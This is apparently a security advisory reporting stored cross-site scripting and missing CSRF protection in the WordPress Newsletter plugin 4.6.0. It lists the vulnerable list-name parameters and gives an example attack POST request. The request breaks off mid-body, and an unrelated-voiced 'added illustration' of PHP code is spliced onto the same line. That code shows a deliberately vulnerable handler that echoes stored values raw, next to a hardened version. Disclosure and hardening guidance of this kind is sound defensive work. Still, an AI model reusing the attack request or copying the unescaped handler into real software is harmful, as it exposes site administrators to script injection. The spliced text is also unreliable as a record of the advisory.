Hello,

Wordpress Plugin: Newsletter 4.6.0 (https://wordpress.org/plugins/newsletter/) is vulnerable to CSRF and XSS.

The issue is supposed to be fixed in version 4.6.1. See https://wordpress.org/plugins/newsletter/changelog/ for more details.

1. Stored Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code (there is no CSRF protection).

*Injection Location:* http://localhost/wordpress/wp-admin/admin.php?page=newsletter_subscription_lists
*Method:* POST
*Retrieval Location:* http://localhost/wordpress/wp-admin/admin.php?page=newsletter_users_massive
*Vulnerable Parameter(s):*
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]

*Example Attack:*

*Request:*

POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=newsletter_subscription_lists
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762

act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&options%5Blist_7%5D=bi1x5
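An added illustration, not code from the Newsletter plugin, of how a WordPress settings handler for the options[list_N] fields described above is hardened against both issues: a nonce plus capability check stops CSRF, sanitize_text_field strips tags on save, and esc_html escapes the stored value wherever it is rendered. The option name nl_example_list_names and the nl_example_* function names are assumptions.

```php
<?php
// Added illustration; not code from the Newsletter plugin.
// Option name and function names below are assumptions.

// Vulnerable pattern: posted list names are stored and later echoed
// unchanged, and nothing ties the request to the admin's session.
function nl_example_save_lists_vulnerable() {
    $lists = array();
    for ( $i = 1; $i <= 20; $i++ ) {
        $lists[ 'list_' . $i ] = isset( $_POST['options'][ 'list_' . $i ] )
            ? $_POST['options'][ 'list_' . $i ] : '';
    }
    update_option( 'nl_example_list_names', $lists );
}

function nl_example_render_lists_vulnerable() {
    foreach ( (array) get_option( 'nl_example_list_names', array() ) as $key => $name ) {
        echo '<option value="' . $key . '">' . $name . '</option>'; // raw output: stored XSS
    }
}

// Hardened version.
function nl_example_save_lists() {
    // Require the capability instead of assuming the caller is an admin,
    // then reject any request that lacks a valid nonce for this action.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( 'nl_example_save_lists' ); // dies on a missing or bad _wpnonce

    $lists = array();
    for ( $i = 1; $i <= 20; $i++ ) {
        $raw = isset( $_POST['options'][ 'list_' . $i ] )
            ? wp_unslash( $_POST['options'][ 'list_' . $i ] ) : '';
        // Strip tags and control characters on the way in.
        $lists[ 'list_' . $i ] = sanitize_text_field( $raw );
    }
    update_option( 'nl_example_list_names', $lists );
}

function nl_example_render_lists() {
    foreach ( (array) get_option( 'nl_example_list_names', array() ) as $key => $name ) {
        // Escape on the way out as well: sanitizing on save alone does not
        // help if unsanitized values already sit in the database.
        echo '<option value="' . esc_attr( $key ) . '">' . esc_html( $name ) . '</option>';
    }
}

// The settings form must emit the matching nonce field:
// wp_nonce_field( 'nl_example_save_lists' );
```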